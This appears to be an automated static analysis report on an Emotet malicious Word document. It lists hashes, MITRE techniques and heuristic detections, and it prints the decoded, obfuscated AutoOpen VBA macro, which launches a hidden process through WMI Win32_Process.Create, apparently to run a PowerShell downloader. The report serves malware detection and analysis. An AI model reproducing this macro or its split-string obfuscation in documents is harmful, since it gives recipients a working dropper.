Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 ad5305b6b5ea8f46…

MALICIOUS

Office (OLE)

125.6 KB Created: 2019-05-17 19:20:00 Authoring application: Microsoft Office Word First seen: 2019-12-09
MD5: 6a7ccfa6d6c7c618b244e842a1eba5f1 SHA-1: 00f6719759a932a5da620a237822fe49eed9757c SHA-256: ad5305b6b5ea8f465de11f34610cff8d2f6ebc09c83cecde9c82bc01fe2b7bd8
342 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1134.001 Access Token Manipulation T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The autoopen macro uses GetObject to instantiate WMI objects and then calls the Create method of the Win32_Process class to launch a new process. This is a common technique used by Emotet to download and execute additional malware. The critical heuristic OLE_VBA_SPLIT_KEYWORD_OBFUSCATION indicates that the API name 'WinMgmts' was reassembled from split string literals, a common obfuscation tactic.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1390 bytes
SHA-256: 4c4e3e677410a1af016961e4fd6e1bf884974c642f0f47975ed911e5353dae79
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "j303230"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "d4194270, 0, 0, MSForms, TextBox"
Attribute VB_Control = "S584_5, 1, 1, MSForms, TextBox"

Attribute VB_Name = "T3___7"
Sub _
autoopen( _
)
   a5_94958 = R8218_4_ + (O705376) _
+ (t_423055) + D017109 _
+ (f219368) + 253402639 + (D63_5501) _
+ I3644_73 + 13710545
Set b602663 = GetObject("WiN" + "MgMts:w" + "In32_PRocEssStArTuP")
   w4702276 = i__170 + (U44467) _
+ (d5_32028) + F49516 _
+ (j80621) + 399312268 + (w7_874) _
+ I01299 + 214759072
b602663. _
ShowWindow = vbFalse - vbFalse
   M130_4 = j343_5 + (L_84358) _
+ (j656393) + z827_478 _
+ (q_2455) + 197570308 + (d1636_) _
+ j86521 + 82897269
Set r599996 = GetObject("WiN" + "MgMts:w" + "In32_PRocEss")
   z586380 = U2056127 + (D352494) _
+ (C4742522) + r192957 _
+ (p75976) + 672767165 + (Q88_84) _
+ o08_4_6 + 126654000
r599996.Create E78982 + "po" + j71961 + j303230.S584_5 + j303230.d4194270 + A0045438, F67_713, b602663, a7__94
   l13_4264 = s85149_ + (d186125) _
+ (m2388692) + L447996 _
+ (D0562_) + 795298052 + (B1664985) _
+ C_4244 + 159415048
End Sub


Attribute VB_Name = "z970321"

Open this report in the interactive analyzer, or submit your own file for analysis.